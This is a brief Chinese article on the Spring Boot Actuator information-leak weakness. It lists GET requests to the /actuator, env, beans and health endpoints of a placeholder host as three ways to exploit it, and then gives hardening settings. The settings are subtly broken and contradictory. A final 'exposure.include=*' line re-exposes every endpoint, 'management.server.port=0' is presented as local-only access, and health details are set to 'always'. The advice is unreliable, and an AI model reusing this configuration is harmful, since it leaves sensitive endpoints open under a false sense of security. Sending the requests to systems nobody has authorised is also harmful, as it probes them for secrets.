可造成敏感信息泄露！Spring Boot之Actuator信息泄露漏洞三种利用方式总结

在Spring Boot应用中，Actuator模块提供了一组用于监控和管理应用程序的接口。如果配置不当，可能会导致敏感信息的泄露。以下是针对Actuator信息泄露漏洞的三种利用方式：
 
1. 查看所有可用的端点：

GET http://<host>:<port>/actuator

 
2. 获取应用程序的环境信息：

GET http://<host>:<port>/actuator/env

 
3. 利用特定端点获取敏感信息，例如`beans`端点可以暴露应用程序的Bean信息，`health`端点可以暴露健康检查详情。

GET http://<host>:<port>/actuator/beans

GET http://<host>:<port>/actuator/health

 
为了防止此类问题，请确保Actuator端点的安全性。可以通过配置`application.properties`或`application.yml`文件来限制对Actuator端点的访问：
 
```properties
# application.properties
 
# 禁用不需要的端点
management.endpoints.web.exposure.include=health,info
 
# 仅允许本地访问
management.endpoints.web.base-path=/actuator
management.server.port=0
 
# 通过角色来限制访问
management.endpoints.web.exposure.include=health,info
management.endpoint.health.show-details=always
management.endpoint.health.roles=ACTUATOR
management.endpoints.web.exposure.include=*

在实际部署时，应该通过防火墙、网络安全组配置或其他安全措施来进一步保护Actuator端点，确保只有授权的用户可以访问。